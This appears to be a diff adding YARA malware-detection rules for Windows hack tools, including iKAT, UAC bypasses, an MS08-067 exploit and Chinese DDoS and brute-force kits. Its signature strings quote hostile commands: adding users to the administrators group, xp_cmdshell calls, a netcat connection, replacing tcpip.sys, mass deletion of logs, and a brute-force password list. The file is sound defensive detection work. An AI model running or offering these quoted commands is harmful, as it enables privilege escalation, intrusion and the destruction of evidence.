+		$s0 = "1433" wide fullword
+		$s1 = "1433V" wide
+		$s2 = "UUUMUUUfUUUfUUUfUUUfUUUfUUUfUUUfUUUfUUUfUUUfUUUMUUU" ascii fullword
+	condition:
+		( $magic at 0 ) and all of ($s*)
+}
+
+rule WCE_Modified_1_1014 {
+	meta:
+		description = "Modified (packed) version of Windows Credential Editor"
+		author = "Florian Roth"
+		hash = "09a412ac3c85cedce2642a19e99d8f903a2e0354"
+		score = 70
+	strings:
+		$s0 = "LSASS.EXE" fullword ascii
+		$s1 = "_CREDS" ascii
+		$s9 = "Using WCE " ascii
+	condition:
+		all of them
+}
+
+rule ReactOS_cmd_valid {
+	meta:
+		description = "ReactOS cmd.exe with correct file name - maybe packed with software or part of hacker toolset"
+		author = "Florian Roth"
+		date = "05.11.14"
+		reference = "http://www.elifulkerson.com/articles/suzy-sells-cmd-shells.php"
+		score = 30
+		hash = "b88f050fa69d85af3ff99af90a157435296cbb6e"
+	strings:
+		$s1 = "ReactOS Command Processor" fullword wide
+		$s2 = "Copyright (C) 1994-1998 Tim Norman and others" fullword wide
+		$s3 = "Eric Kohl and others" fullword wide
+		$s4 = "ReactOS Operating System" fullword wide
+	condition:
+		all of ($s*)
+}
+
+rule iKAT_wmi_rundll {
+	meta:
+		description = "This exe will attempt to use WMI to Call the Win32_Process event to spawn rundll - file wmi_rundll.exe"
+		author = "Florian Roth"
+		date = "05.11.14"
+		score = 65
+		reference = "http://ikat.ha.cked.net/Windows/functions/ikatfiles.html"
+		hash = "97c4d4e6a644eed5aa12437805e39213e494d120"
+	strings:
+		$s0 = "This operating system is not supported." fullword ascii
+		$s1 = "Error!" fullword ascii
+		$s2 = "Win32 only!" fullword ascii
+		$s3 = "COMCTL32.dll" fullword ascii
+		$s4 = "[LordPE]" ascii
+		$s5 = "CRTDLL.dll" fullword ascii
+		$s6 = "VBScript" fullword ascii
+		$s7 = "CoUninitialize" fullword ascii
+	condition:
+		all of them and filesize < 15KB
+}
+
+rule iKAT_revelations {
+	meta:
+		description = "iKAT hack tool showing the content of password fields - file revelations.exe"
+		author = "Florian Roth"
+		date = "05.11.14"
+		score = 75
+		reference = "http://ikat.ha.cked.net/Windows/functions/ikatfiles.html"
+		hash = "c4e217a8f2a2433297961561c5926cbd522f7996"
+	strings:
+		$s0 = "The RevelationHelper.DLL file is corrupt or missing." fullword ascii
+		$s8 = "BETAsupport@snadboy.com" fullword wide
+		$s9 = "support@snadboy.com" fullword wide
+		$s14 = "RevelationHelper.dll" fullword ascii
+	condition:
+		all of them
+}
+
+rule iKAT_priv_esc_tasksch {
+	meta:
+		description = "Task Schedulder Local Exploit - Windows local priv-esc using Task Scheduler, published by webDevil. Supports Windows 7 and Vista."
+		author = "Florian Roth"
+		date = "05.11.14"
+		score = 75		
+		reference = "http://ikat.ha.cked.net/Windows/functions/ikatfiles.html"
+		hash = "84ab94bff7abf10ffe4446ff280f071f9702cf8b"
+	strings:
+		$s0 = "objShell.Run \"schtasks /change /TN wDw00t /disable\",,True" fullword ascii
+		$s3 = "objShell.Run \"schtasks /run /TN wDw00t\",,True" fullword ascii
+		$s4 = "'objShell.Run \"cmd /c copy C:\\windows\\system32\\tasks\\wDw00t .\",,True" fullword ascii
+		$s6 = "a.WriteLine (\"schtasks /delete /f /TN wDw00t\")" fullword ascii
+		$s7 = "a.WriteLine (\"net user /add ikat ikat\")" fullword ascii
+		$s8 = "a.WriteLine (\"cmd.exe\")" fullword ascii
+		$s9 = "strFileName=\"C:\\windows\\system32\\tasks\\wDw00t\"" fullword ascii
+		$s10 = "For n = 1 To (Len (hexXML) - 1) step 2" fullword ascii
+		$s13 = "output.writeline \" Should work on Vista/Win7/2008 x86/x64\"" fullword ascii
+		$s11 = "Set objExecObject = objShell.Exec(\"cmd /c schtasks /query /XML /TN wDw00t\")" fullword ascii
+		$s12 = "objShell.Run \"schtasks /create /TN wDw00t /sc monthly /tr \"\"\"+biatchFile+\"" ascii
+		$s14 = "a.WriteLine (\"net localgroup administrators /add v4l\")" fullword ascii		
+		$s20 = "Set ts = fso.createtextfile (\"wDw00t.xml\")" fullword ascii
+	condition:
+		2 of them
+}
+
+rule iKAT_command_lines_agent {
+	meta:
+		description = "iKAT hack tools set agent - file ikat.exe"
+		author = "Florian Roth"
+		date = "05.11.14"
+		score = 75		
+		reference = "http://ikat.ha.cked.net/Windows/functions/ikatfiles.html"
+		hash = "c802ee1e49c0eae2a3fc22d2e82589d857f96d94"
+	strings:
+		$s0 = "Extended Module: super mario brothers" fullword ascii
+		$s1 = "Extended Module: " fullword ascii
+		$s3 = "ofpurenostalgicfeeling" fullword ascii
+		$s8 = "-supermariobrotheretic" fullword ascii
+		$s9 = "!http://132.147.96.202:80" fullword ascii
+		$s12 = "iKAT Exe Template" fullword ascii
+		$s15 = "withadancyflavour.." fullword ascii
+		$s16 = "FastTracker v2.00   " fullword ascii
+	condition:
+		4 of them
+}
+
+rule iKAT_cmd_as_dll {
+	meta:
+		description = "iKAT toolset file cmd.dll ReactOS file cloaked"
+		author = "Florian Roth"
+		date = "05.11.14"
+		score = 65
+		reference = "http://ikat.ha.cked.net/Windows/functions/ikatfiles.html"
+		hash = "b5d0ba941efbc3b5c97fe70f70c14b2050b8336a"
+	strings:
+		$s1 = "cmd.exe" fullword wide
+		$s2 = "ReactOS Development Team" fullword wide
+		$s3 = "ReactOS Command Processor" fullword wide
+		
+		$ext = "extension: .dll" nocase
+	condition:
+		all of ($s*) and $ext 
+}
+
+rule iKAT_tools_nmap {
+	meta:
+		description = "Generic rule for NMAP - based on NMAP 4 standalone"
+		author = "Florian Roth"
+		date = "05.11.14"
+		score = 50
+		reference = "http://ikat.ha.cked.net/Windows/functions/ikatfiles.html"
+		hash = "d0543f365df61e6ebb5e345943577cc40fca8682"
+	strings:
+		$s0 = "Insecure.Org" fullword wide
+		$s1 = "Copyright (c) Insecure.Com" fullword wide
+		$s2 = "nmap" fullword nocase
+		$s3 = "Are you alert enough to be using Nmap?  Have some coffee or Jolt(tm)." ascii
+	condition:
+		all of them
+}
+
+rule iKAT_startbar {
+	meta:
+		description = "Tool to hide unhide the windows startbar from command line - iKAT hack tools - file startbar.exe"
+		author = "Florian Roth"
+		date = "05.11.14"
+		score = 50
+		reference = "http://ikat.ha.cked.net/Windows/functions/ikatfiles.html"
+		hash = "0cac59b80b5427a8780168e1b85c540efffaf74f"
+	strings:
+		$s2 = "Shinysoft Limited1" fullword ascii
+		$s3 = "Shinysoft Limited0" fullword ascii
+		$s4 = "Wellington1" fullword ascii
+		$s6 = "Wainuiomata1" fullword ascii
+		$s8 = "56 Wright St1" fullword ascii
+		$s9 = "UTN-USERFirst-Object" fullword ascii
+		$s10 = "New Zealand1" fullword ascii
+	condition:
+		all of them
+}
+
+rule iKAT_gpdisable_customcmd_kitrap0d_uacpoc {
+	meta:
+		description = "iKAT hack tool set generic rule - from files gpdisable.exe, customcmd.exe, kitrap0d.exe, uacpoc.exe"
+		author = "Florian Roth"
+		date = "05.11.14"
+		reference = "http://ikat.ha.cked.net/Windows/functions/ikatfiles.html"
+		super_rule = 1
+		hash0 = "814c126f21bc5e993499f0c4e15b280bf7c1c77f"
+		hash1 = "2725690954c2ad61f5443eb9eec5bd16ab320014"
+		hash2 = "75f5aed1e719443a710b70f2004f34b2fe30f2a9"
+		hash3 = "b65a460d015fd94830d55e8eeaf6222321e12349"
+		score = 20
+	strings:
+		$s0 = "Failed to get temp file for source AES decryption" fullword
+		$s5 = "Failed to get encryption header for pwd-protect" fullword
+		$s17 = "Failed to get filetime" fullword
+		$s20 = "Failed to delete temp file for password decoding (3)" fullword
+	condition:
+		all of them
+}
+
+rule iKAT_Tool_Generic {
+	meta:
+		description = "Generic Rule for hack tool iKAT files gpdisable.exe, kitrap0d.exe, uacpoc.exe"
+		author = "Florian Roth"
+		date = "05.11.14"
+		score = 55
+		reference = "http://ikat.ha.cked.net/Windows/functions/ikatfiles.html"
+		super_rule = 1
+		hash0 = "814c126f21bc5e993499f0c4e15b280bf7c1c77f"
+		hash1 = "75f5aed1e719443a710b70f2004f34b2fe30f2a9"
+		hash2 = "b65a460d015fd94830d55e8eeaf6222321e12349"
+	strings:
+		$s0 = "<IconFile>C:\\WINDOWS\\App.ico</IconFile>" fullword
+		$s1 = "Failed to read the entire file" fullword
+		$s4 = "<VersionCreatedBy>14.4.0</VersionCreatedBy>" fullword
+		$s8 = "<ProgressCaption>Run &quot;executor.bat&quot; once the shell has spawned.</P"
+		$s9 = "Running Zip pipeline..." fullword
+		$s10 = "<FinTitle />" fullword
+		$s12 = "<AutoTemp>0</AutoTemp>" fullword
+		$s14 = "<DefaultDir>%TEMP%</DefaultDir>" fullword
+		$s15 = "AES Encrypting..." fullword
+		$s20 = "<UnzipDir>%TEMP%</UnzipDir>" fullword
+	condition:
+		all of them
+}
+
+rule BypassUac2 {
+	meta:
+		description = "Auto-generated rule - file BypassUac2.zip"
+		author = "yarGen Yara Rule Generator"
+		hash = "ef3e7dd2d1384ecec1a37254303959a43695df61"
+	strings:
+		$s0 = "/BypassUac/BypassUac/BypassUac_Utils.cpp" fullword ascii
+		$s1 = "/BypassUac/BypassUacDll/BypassUacDll.aps" fullword ascii
+		$s3 = "/BypassUac/BypassUac/BypassUac.ico" fullword ascii
+	condition:
+		all of them
+}
+
+rule BypassUac_3 {
+	meta:
+		description = "Auto-generated rule - file BypassUacDll.dll"
+		author = "yarGen Yara Rule Generator"
+		hash = "1974aacd0ed987119999735cad8413031115ce35"
+	strings:
+		$s0 = "BypassUacDLL.dll" fullword wide
+		$s1 = "\\Release\\BypassUacDll" ascii
+		$s3 = "Win7ElevateDLL" fullword wide
+		$s7 = "BypassUacDLL" fullword wide
+	condition:
+		3 of them
+}
+
+rule BypassUac_9 {
+	meta:
+		description = "Auto-generated rule - file BypassUac.zip"
+		author = "yarGen Yara Rule Generator"
+		hash = "93c2375b2e4f75fc780553600fbdfd3cb344e69d"
+	strings:
+		$s0 = "/x86/BypassUac.exe" fullword ascii
+		$s1 = "/x64/BypassUac.exe" fullword ascii
+		$s2 = "/x86/BypassUacDll.dll" fullword ascii
+		$s3 = "/x64/BypassUacDll.dll" fullword ascii
+		$s15 = "BypassUac" fullword ascii
+	condition:
+		all of them
+}
+
+rule BypassUacDll_6 {
+	meta:
+		description = "Auto-generated rule - file BypassUacDll.aps"
+		author = "yarGen Yara Rule Generator"
+		hash = "58d7b24b6870cb7f1ec4807d2f77dd984077e531"
+	strings:
+		$s3 = "BypassUacDLL.dll" fullword wide
+		$s4 = "AFX_IDP_COMMAND_FAILURE" fullword ascii
+	condition:
+		all of them
+}
+
+rule BypassUacDll_7 {
+	meta:
+		description = "Auto-generated rule - file BypassUacDll.aps"
+		author = "yarGen Yara Rule Generator"
+		hash = "58d7b24b6870cb7f1ec4807d2f77dd984077e531"
+	strings:
+		$s3 = "BypassUacDLL.dll" fullword wide
+		$s4 = "AFX_IDP_COMMAND_FAILURE" fullword ascii
+	condition:
+		all of them
+}
+
+rule BypassUac_EXE {
+	meta:
+		description = "Auto-generated rule - file BypassUacDll.aps"
+		author = "yarGen Yara Rule Generator"
+		hash = "58d7b24b6870cb7f1ec4807d2f77dd984077e531"
+	strings:
+		$s1 = "Wole32.dll" wide
+		$s3 = "System32\\migwiz" wide
+		$s4 = "System32\\migwiz\\CRYPTBASE.dll" wide
+		$s5 = "Elevation:Administrator!new:" wide
+		$s6 = "BypassUac" wide
+	condition:
+		all of them
+}
+
+rule APT_Proxy_Malware_Packed_dev
+{
+	meta:
+		author = "FRoth"
+		date = "2014-11-10"
+		description = "APT Malware - Proxy"
+		hash = "6b6a86ceeab64a6cb273debfa82aec58"
+		score = 50
+	strings:
+		$string0 = "PECompact2" fullword
+		$string1 = "[LordPE]"
+		$string2 = "steam_ker.dll"
+	condition:
+		all of them
+}
+
+rule Tzddos_DDoS_Tool_CN {
+	meta:
+		description = "Disclosed hacktool set - file tzddos"
+		author = "Florian Roth"
+		date = "17.11.14"
+		score = 60
+		hash = "d4c517eda5458247edae59309453e0ae7d812f8e"
+	strings:
+		$s0 = "for /f %%a in (host.txt) do (" fullword ascii
+		$s1 = "for /f \"eol=S tokens=1 delims= \" %%i in (s2.txt) do echo %%i>>host.txt" fullword ascii
+		$s2 = "del host.txt /q" fullword ascii
+		$s3 = "for /f \"eol=- tokens=1 delims= \" %%i in (result.txt) do echo %%i>>s1.txt" fullword ascii
+		$s4 = "start Http.exe %%a %http%" fullword ascii
+		$s5 = "for /f \"eol=P tokens=1 delims= \" %%i in (s1.txt) do echo %%i>>s2.txt" fullword ascii
+		$s6 = "del Result.txt s2.txt s1.txt " fullword ascii
+	condition:
+		all of them
+}
+
+rule Ncat_Hacktools_CN {
+	meta:
+		description = "Disclosed hacktool set - file nc.exe"
+		author = "Florian Roth"
+		date = "17.11.14"
+		score = 60
+		hash = "001c0c01c96fa56216159f83f6f298755366e528"
+	strings:
+		$s0 = "nc -l -p port [options] [hostname] [port]" fullword ascii
+		$s2 = "nc [-options] hostname port[s] [ports] ... " fullword ascii
+		$s3 = "gethostpoop fuxored" fullword ascii
+		$s6 = "VERNOTSUPPORTED" fullword ascii
+		$s7 = "%s [%s] %d (%s)" fullword ascii
+		$s12 = " `--%s' doesn't allow an argument" fullword ascii
+	condition:
+		all of them
+}
+
+rule MS08_067_Exploit_Hacktools_CN {
+	meta:
+		description = "Disclosed hacktool set - file cs.exe"
+		author = "Florian Roth"
+		date = "17.11.14"
+		score = 60
+		hash = "a3e9e0655447494253a1a60dbc763d9661181322"
+	strings:
+		$s0 = "MS08-067 Exploit for CN by EMM@ph4nt0m.org" fullword ascii
+		$s3 = "Make SMB Connection error:%d" fullword ascii
+		$s5 = "Send Payload Over!" fullword ascii
+		$s7 = "Maybe Patched!" fullword ascii
+		$s8 = "RpcExceptionCode() = %u" fullword ascii
+		$s11 = "ph4nt0m" fullword wide
+		$s12 = "\\\\%s\\IPC$" fullword ascii
+	condition:
+		4 of them
+}
+
+rule Hacktools_CN_Burst_sql {
+	meta:
+		description = "Disclosed hacktool set - file sql.exe"
+		author = "Florian Roth"
+		date = "17.11.14"
+		score = 60
+		hash = "d5139b865e99b7a276af7ae11b14096adb928245"
+	strings:
+		$s0 = "s.exe %s %s %s %s %d /save" fullword ascii
+		$s2 = "s.exe start error...%d" fullword ascii
+		$s4 = "EXEC sp_addextendedproc xp_cmdshell,'xplog70.dll'" fullword ascii
+		$s7 = "EXEC master..xp_cmdshell 'wscript.exe cc.js'" fullword ascii
+		$s10 = "Result.txt" fullword ascii
+		$s11 = "Usage:sql.exe [options]" fullword ascii
+		$s17 = "%s root %s %d error" fullword ascii
+		$s18 = "Pass.txt" fullword ascii
+		$s20 = "SELECT sillyr_at_gmail_dot_com INTO DUMPFILE '%s\\\\sillyr_x.so' FROM sillyr_x" fullword ascii
+	condition:
+		6 of them
+}
+
+rule Hacktools_CN_JoHor_Rdos {
+	meta:
+		description = "Disclosed hacktool set - file spec.vbp"
+		author = "Florian Roth"
+		date = "17.11.14"
+		score = 60
+		hash = "400a90c9eabeb94ae05e5036e21dc922b0c1ffad"
+	strings:
+		$s3 = "service@dywt.com.cn" fullword ascii
+		$s9 = "www.dywt.com.cn" fullword ascii
+		$s17 = "This is a runtime library file for EPL applications. The EPL is a software devel" ascii
+	condition:
+		2 of them
+}
+
+rule Hacktools_CN_Panda_445TOOL {
+	meta:
+		description = "Disclosed hacktool set - file 445TOOL.rar"
+		author = "Florian Roth"
+		date = "17.11.14"
+		score = 60
+		hash = "92050ba43029f914696289598cf3b18e34457a11"
+	strings:
+		$s0 = "scan.bat" fullword ascii
+		$s1 = "Http.exe" fullword ascii
+		$s2 = "GOGOGO.bat" fullword ascii
+		$s3 = "ip.txt" fullword ascii
+	condition:
+		all of them
+}
+
+rule Hacktools_CN_Panda_445 {
+	meta:
+		description = "Disclosed hacktool set - file 445.rar"
+		author = "Florian Roth"
+		date = "17.11.14"
+		score = 60
+		hash = "a61316578bcbde66f39d88e7fc113c134b5b966b"
+	strings:
+		$s0 = "for /f %%i in (ips.txt) do (start cmd.bat %%i)" fullword ascii
+		$s1 = "445\\nc.exe" fullword ascii
+		$s2 = "445\\s.exe" fullword ascii
+		$s3 = "cs.exe %1" fullword ascii
+		$s4 = "445\\cs.exe" fullword ascii
+		$s5 = "445\\ip.txt" fullword ascii
+		$s6 = "445\\cmd.bat" fullword ascii
+		$s9 = "@echo off" fullword ascii
+	condition:
+		all of them
+}
+
+rule Hacktools_CN_WinEggDrop {
+	meta:
+		description = "Disclosed hacktool set - file s.exe"
+		author = "Florian Roth"
+		date = "17.11.14"
+		score = 60
+		hash = "7665011742ce01f57e8dc0a85d35ec556035145d"
+	strings:
+		$s0 = "Normal Scan: About To Scan %u IP For %u Ports Using %d Thread" fullword ascii
+		$s2 = "SYN Scan: About To Scan %u IP For %u Ports Using %d Thread" fullword ascii
+		$s6 = "Example: %s TCP 12.12.12.12 12.12.12.254 21 512 /Banner" fullword ascii
+		$s8 = "Something Wrong About The Ports" fullword ascii
+		$s9 = "Performing Time: %d/%d/%d %d:%d:%d --> " fullword ascii
+		$s10 = "Example: %s TCP 12.12.12.12/24 80 512 /T8 /Save" fullword ascii
+		$s12 = "%u Ports Scanned.Taking %d Threads " fullword ascii
+		$s13 = "%-16s %-5d -> \"%s\"" fullword ascii
+		$s14 = "SYN Scan Can Only Perform On WIN 2K Or Above" fullword ascii
+		$s17 = "SYN Scan: About To Scan %s:%d Using %d Thread" fullword ascii
+		$s18 = "Scan %s Complete In %d Hours %d Minutes %d Seconds. Found %u Open Ports" fullword ascii
+	condition:
+		5 of them
+}
+
+rule Hacktools_CN_Scan_BAT {
+	meta:
+		description = "Disclosed hacktool set - file scan.bat"
+		author = "Florian Roth"
+		date = "17.11.14"
+		score = 60
+		hash = "6517d7c245f1300e42f7354b0fe5d9666e5ce52a"
+	strings:
+		$s0 = "for /f %%a in (host.txt) do (" fullword ascii
+		$s1 = "for /f \"eol=S tokens=1 delims= \" %%i in (s2.txt) do echo %%i>>host.txt" fullword ascii
+		$s2 = "del host.txt /q" fullword ascii
+		$s3 = "for /f \"eol=- tokens=1 delims= \" %%i in (result.txt) do echo %%i>>s1.txt" fullword ascii
+		$s4 = "start Http.exe %%a %http%" fullword ascii
+		$s5 = "for /f \"eol=P tokens=1 delims= \" %%i in (s1.txt) do echo %%i>>s2.txt" fullword ascii
+	condition:
+		5 of them
+}
+
+rule Hacktools_CN_Panda_Burst {
+	meta:
+		description = "Disclosed hacktool set - file Burst.rar"
+		author = "Florian Roth"
+		date = "17.11.14"
+		score = 60
+		hash = "ce8e3d95f89fb887d284015ff2953dbdb1f16776"
+	strings:
+		$s0 = "@sql.exe -f ip.txt -m syn -t 3306 -c 5000 -u http://60.15.124.106:63389/tasksvr." ascii
+	condition:
+		all of them
+}
+
+rule Hacktools_CN_445_cmd {
+	meta:
+		description = "Disclosed hacktool set - file cmd.bat"
+		author = "Florian Roth"
+		date = "17.11.14"
+		score = 60
+		hash = "69b105a3aec3234819868c1a913772c40c6b727a"
+	strings:
+		$bat = "@echo off" fullword ascii
+		$s0 = "cs.exe %1" fullword ascii
+		$s2 = "nc %1 4444" fullword ascii
+	condition:
+		$bat at 0 and all of ($s*)
+}
+
+rule Hacktools_CN_GOGOGO_Bat {
+	meta:
+		description = "Disclosed hacktool set - file GOGOGO.bat"
+		author = "Florian Roth"
+		date = "17.11.14"
+		score = 60
+		hash = "4bd4f5b070acf7fe70460d7eefb3623366074bbd"
+	strings:
+		$s0 = "for /f \"delims=\" %%x in (endend.txt) do call :lisoob %%x" fullword ascii
+		$s1 = "http://www.tzddos.com/ -------------------------------------------->byebye.txt" fullword ascii
+		$s2 = "ren %systemroot%\\system32\\drivers\\tcpip.sys tcpip.sys.bak" fullword ascii
+		$s4 = "IF /I \"%wangle%\"==\"\" ( goto start ) else ( goto erromm )" fullword ascii
+		$s5 = "copy *.tzddos scan.bat&del *.tzddos" fullword ascii
+		$s6 = "del /f tcpip.sys" fullword ascii
+		$s9 = "if /i \"%CB%\"==\"www.tzddos.com\" ( goto mmbat ) else ( goto wangle )" fullword ascii
+		$s10 = "call scan.bat" fullword ascii
+		$s12 = "IF /I \"%erromm%\"==\"\" ( goto start ) else ( goto zuihoujh )" fullword ascii
+		$s13 = "IF /I \"%zuihoujh%\"==\"\" ( goto start ) else ( goto laji )" fullword ascii
+		$s18 = "sc config LmHosts start= auto" fullword ascii
+		$s19 = "copy tcpip.sys %systemroot%\\system32\\drivers\\tcpip.sys > nul" fullword ascii
+		$s20 = "ren %systemroot%\\system32\\dllcache\\tcpip.sys tcpip.sys.bak" fullword ascii
+	condition:
+		3 of them
+}
+
+rule Hacktools_CN_Burst_pass {
+	meta:
+		description = "Disclosed hacktool set - file pass.txt"
+		author = "Florian Roth"
+		date = "17.11.14"
+		score = 60
+		hash = "55a05cf93dbd274355d798534be471dff26803f9"
+	strings:
+		$s0 = "123456.com" fullword ascii
+		$s1 = "123123.com" fullword ascii
+		$s2 = "360.com" fullword ascii
+		$s3 = "123.com" fullword ascii
+		$s4 = "juso.com" fullword ascii
+		$s5 = "sina.com" fullword ascii
+		$s7 = "changeme" fullword ascii
+		$s8 = "master" fullword ascii
+		$s9 = "google.com" fullword ascii
+		$s10 = "chinanet" fullword ascii
+		$s12 = "lionking" fullword ascii
+	condition:
+		all of them
+}
+
+rule Hacktools_CN_JoHor_Posts_Killer {
+	meta:
+		description = "Disclosed hacktool set - file JoHor_Posts_Killer.exe"
+		author = "Florian Roth"
+		date = "17.11.14"
+		score = 60
+		hash = "d157f9a76f9d72dba020887d7b861a05f2e56b6a"
+	strings:
+		$s0 = "Multithreading Posts_Send Killer" fullword ascii
+		$s3 = "GET [Access Point] HTTP/1.1" fullword ascii
+		$s6 = "The program's need files was not exist!" fullword ascii
+		$s7 = "JoHor_Posts_Killer" fullword wide
+		$s8 = "User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" fullword ascii
+		$s10 = "  ( /s ) :" fullword ascii
+		$s11 = "forms.vbp" fullword ascii
+		$s12 = "forms.vcp" fullword ascii
+		$s13 = "Software\\FlySky\\E\\Install" fullword ascii
+	condition:
+		5 of them
+}
+
+rule Hacktools_CN_JoHor_Rdos_3_6_uplis {
+	meta:
+		description = "Disclosed hacktool set - file uplis.vbp"
+		author = "Florian Roth"
+		date = "17.11.14"
+		score = 60
+		hash = "a87d00d78838c2d968b72330ee6f21f69b2caae5"
+	strings:
+		$s0 = "http://dywt.com.cn" fullword ascii
+		$s1 = "service@dywt.com.cn" fullword ascii
+		$s4 = "GetNewInf" fullword ascii
+		$s5 = "This is a runtime library file for EPL applications. The EPL is a software devel" ascii
+		$s8 = "yiyuyan" fullword ascii
+	condition:
+		4 of them
+}
+
+rule Hacktools_CN_Panda_tesksd {
+	meta:
+		description = "Disclosed hacktool set - file tesksd.jpg"
+		author = "Florian Roth"
+		date = "17.11.14"
+		score = 60
+		hash = "922147b3e1e6cf1f5dd5f64a4e34d28bdc9128cb"
+	strings:
+		$s0 = "name=\"Microsoft.Windows.Common-Controls\" " fullword ascii
+		$s1 = "ExeMiniDownload.exe" fullword wide
+		$s16 = "POST %Hs" fullword ascii
+	condition:
+		all of them
+}
+
+rule Hacktools_CN_Panda_k {
+	meta:
+		description = "Disclosed hacktool set - file k.exe"
+		author = "Florian Roth"
+		date = "17.11.14"
+		score = 60
+		hash = "8d1170df533238ac2da7826bd8997917be1e1517"
+	strings:
+		$s0 = "(http://www.eyuyan.com)" fullword wide
+		$s1 = "trin" fullword wide
+		$s2 = "FAUL" fullword wide
+		$s10 = " program must be run " fullword ascii
+	condition:
+		all of them
+}
+
+rule Hacktools_CN_Http {
+	meta:
+		description = "Disclosed hacktool set - file Http.exe"
+		author = "Florian Roth"
+		date = "17.11.14"
+		score = 60
+		hash = "788bf0fdb2f15e0c628da7056b4e7b1a66340338"
+	strings:
+		$s0 = "RPCRT4.DLL" fullword ascii
+		$s1 = "WNetAddConnection2A" fullword ascii
+		$s2 = "NdrPointerBufferSize" fullword ascii
+		$s3 = "_controlfp" fullword ascii
+	condition:
+		all of them and filesize < 10KB
+}
+
+rule Hacktools_CN_JoHor_Rdos_get {
+	meta:
+		description = "Disclosed hacktool set - file get.vbp"
+		author = "Florian Roth"
+		date = "17.11.14"
+		score = 60
+		hash = "09c32ca167136a17fd69df8c525ea5ffeca6c534"
+	strings:
+		$s1 = "http://dywt.com.cn" fullword ascii
+		$s2 = "service@dywt.com.cn" fullword ascii
+		$s3 = "Uncompress" fullword ascii
+		$s5 = "GetNewInf" fullword ascii
+		$s6 = "This is a runtime library file for EPL applications. The EPL is a software devel" ascii
+		$s10 = "GetMD5" fullword ascii
+		$s12 = "RSACheck" fullword ascii
+	condition:
+		all of them
+}
+
+rule Hacktools_CN_JoHor_Rdos_LineExp {
+	meta:
+		description = "Disclosed hacktool set - file LineExp.vbp"
+		author = "Florian Roth"
+		date = "17.11.14"
+		score = 60
+		hash = "1bd2db477c68cdcba9ae5c3668bd76c51fc12d2e"
+	strings:
+		$s0 = "http://dywt.com.cn" fullword ascii
+		$s1 = "service@dywt.com.cn" fullword ascii
+		$s2 = "EThread.fne" fullword ascii
+		$s3 = "GetNewInf" fullword ascii
+		$s4 = "This is a runtime library file for EPL applications. The EPL is a software devel" ascii
+		$s5 = "CloseThreadHandle" fullword ascii
+		$s6 = "WaitThread" fullword ascii
+		$s8 = "CreateCriticalSection" fullword ascii
+	condition:
+		all of them
+}
+
+rule Hacktools_CN_Burst_Start {
+	meta:
+		description = "Disclosed hacktool set - file Start.bat - DoS tool"
+		author = "Florian Roth"
+		date = "17.11.14"
+		score = 60
+		hash = "75d194d53ccc37a68286d246f2a84af6b070e30c"
+	strings:
+		$s0 = "for /f \"eol= tokens=1,2 delims= \" %%i in (ip.txt) do (" fullword ascii
+		$s1 = "Blast.bat /r 600" fullword ascii
+		$s2 = "Blast.bat /l Blast.bat" fullword ascii
+		$s3 = "Blast.bat /c 600" fullword ascii
+		$s4 = "start Clear.bat" fullword ascii
+		$s5 = "del Result.txt" fullword ascii
+		$s6 = "s syn %%i %%j 3306 /save" fullword ascii
+		$s7 = "start Thecard.bat" fullword ascii
+		$s10 = "setlocal enabledelayedexpansion" fullword ascii
+	condition:
+		5 of them
+}
+
+rule Hacktools_CN_Panda_tasksvr {
+	meta:
+		description = "Disclosed hacktool set - file tasksvr.exe"
+		author = "Florian Roth"
+		date = "17.11.14"
+		score = 60
+		hash = "a73fc74086c8bb583b1e3dcfd326e7a383007dc0"
+	strings:
+		$s2 = "Consys21.dll" fullword ascii
+		$s4 = "360EntCall.exe" fullword wide
+		$s15 = "Beijing1" fullword ascii
+	condition:
+		all of them
+}
+rule Hacktools_CN_Burst_Clear {
+	meta:
+		description = "Disclosed hacktool set - file Clear.bat"
+		author = "Florian Roth"
+		date = "17.11.14"
+		score = 60
+		hash = "148c574a4e6e661aeadaf3a4c9eafa92a00b68e4"
+	strings:
+		$s0 = "del /f /s /q %systemdrive%\\*.log    " fullword ascii
+		$s1 = "del /f /s /q %windir%\\*.bak    " fullword ascii
+		$s4 = "del /f /s /q %systemdrive%\\*.chk    " fullword ascii
+		$s5 = "del /f /s /q %systemdrive%\\*.tmp    " fullword ascii
+		$s8 = "del /f /q %userprofile%\\COOKIES s\\*.*    " fullword ascii
+		$s9 = "rd /s /q %windir%\\temp & md %windir%\\temp    " fullword ascii
+		$s11 = "del /f /s /q %systemdrive%\\recycled\\*.*    " fullword ascii
+		$s12 = "del /f /s /q \"%userprofile%\\Local Settings\\Temp\\*.*\"    " fullword ascii
+		$s19 = "del /f /s /q \"%userprofile%\\Local Settings\\Temporary Internet Files\\*.*\"   " ascii
+	condition:
+		5 of them
+}
+
+rule Hacktools_CN_Panda_andrew {
+	meta:
+		description = "Disclosed hacktool set - file andrew.exe - sethc.exe Debugger backdoor"
+		author = "Florian Roth"
+		date = "17.11.14"
+		score = 60
+		hash = "abd03ebb08314297b83e6c795cc85bb85e1f4d71"
+	strings:
+		$s0 = "(http://www.eyuyan.com)" fullword wide
+		$s1 = "ClosePrinter" fullword ascii
+		$s18 = "version=\"1.0\" encoding" fullword ascii
+	condition:
+		all of them
+}
+
+rule Hacktools_CN_Burst_Thecard {
+	meta:
+		description = "Disclosed hacktool set - file Thecard.bat"
+		author = "Florian Roth"
+		date = "17.11.14"
+		score = 60
+		hash = "50b01ea0bfa5ded855b19b024d39a3d632bacb4c"
+	strings:
+		$s0 = "tasklist |find \"Clear.bat\"||start Clear.bat" fullword ascii
+		$s1 = "Http://www.coffeewl.com" fullword ascii
+		$s2 = "ping -n 2 localhost 1>nul 2>nul" fullword ascii
+		$s3 = "for /L %%a in (" fullword ascii
+		$s4 = "MODE con: COLS=42 lines=5" fullword ascii
+	condition:
+		all of them
+}
+
+rule Hacktools_CN_Burst_Blast {
+	meta:
+		description = "Disclosed hacktool set - file Blast.bat"
+		author = "Florian Roth"
+		date = "17.11.14"
+		score = 60
+		hash = "b07702a381fa2eaee40b96ae2443918209674051"
+	strings:
+		$s0 = "@sql.exe -f ip.txt -m syn -t 3306 -c 5000 -u http:" ascii
+		$s1 = "@echo off" fullword ascii
+	condition:
+		all of them
+}
+
+rule VUBrute_VUBrute {
+	meta:
+		description = "PoS Scammer Toolbox - http://goo.gl/xiIphp - file VUBrute.exe"
+		author = "Florian Roth"
+		date = "22.11.14"
+		score = 70
+		hash = "166fa8c5a0ebb216c832ab61bf8872da556576a7"
+	strings:
+		$s0 = "Text Files (*.txt);;All Files (*)" fullword ascii
+		$s1 = "http://ubrute.com" fullword ascii
+		$s11 = "IP - %d; Password - %d; Combination - %d" fullword ascii
